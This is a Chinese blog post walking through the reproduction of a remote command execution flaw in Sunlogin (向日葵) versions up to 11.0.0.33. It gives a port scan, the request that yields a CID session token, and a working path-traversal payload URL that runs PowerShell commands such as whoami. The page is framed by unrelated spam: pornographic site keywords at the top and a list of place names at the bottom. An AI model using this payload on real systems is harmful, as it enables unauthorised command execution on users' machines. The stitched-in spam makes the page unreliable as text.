最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

向日葵CNVD-2022-10270/CNVD-2022-03672 復(fù)現(xiàn)

2023-07-21 09:01 作者:逍遙子大表哥  | 我要投稿


向日葵是生活工作中最常用的一款遠(yuǎn)程辦公工具之一。也是目前國內(nèi)市面上用的最多的一款工具。本文來談?wù)勱P(guān)于其CNVD-2022-10270/CNVD-2022-03672漏洞的利用和復(fù)現(xiàn)。

實驗環(huán)境

  • 向日葵 <= 11.0.0.33

  • Kali Linux

端口掃描

我們首先在本地環(huán)境安裝11.0.0.33的低版本向日葵。安裝完成后,并用nmap對靶場進(jìn)行端口掃描。

安裝完成后,在kali中利用nmap端口掃描。

nmap?-p?45000-55000?192.168.50.105

如下圖,我們可以看到目標(biāo)存在61376 61387這幾個端口。

當(dāng)然,為了方便我們可以利用python腳本快速檢測,支持整個網(wǎng)段掃描。



漏洞復(fù)現(xiàn)

在瀏覽器中訪問ip+端口號+cgi-bin/rpc?action=verify-haras (端口號:每一個都嘗試,直到獲取到session值CID

通過上述方法,我們確定了目標(biāo)的端口。現(xiàn)在我們便可以利用payload工具進(jìn)行測試。payload

http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami

訪問paylaod,并在burp中進(jìn)行抓包。

修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344ZlCookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl 效果如下:

同樣,我們只需修改后面的whoami為其他的命令如ipconfig即可。

ifconfig命令
dir命令

安全建議

此漏洞算是比較高危的漏洞,請盡快更新到最新版本。

更多精彩文章 歡迎關(guān)注微信公眾號 kali黑客筆記

向日葵CNVD-2022-10270/CNVD-2022-03672 復(fù)現(xiàn)的評論 (共 條)

分享到微博請遵守國家法律
怀安县| 昆山市| 磴口县| 华安县| 加查县| 大渡口区| 牙克石市| 靖西县| 阳江市| 彰化市| 元氏县| 芷江| 蚌埠市| 毕节市| 博野县| 文成县| 措美县| 佛学| 英吉沙县| 满洲里市| 修武县| 山阳县| 台湾省| 玛多县| 承德县| 临猗县| 万山特区| 香港| 正镶白旗| 潞西市| 陕西省| 军事| 保亭| 迁西县| 凤城市| 灯塔市| 临西县| 元朗区| 临清市| 邓州市| 嘉义县|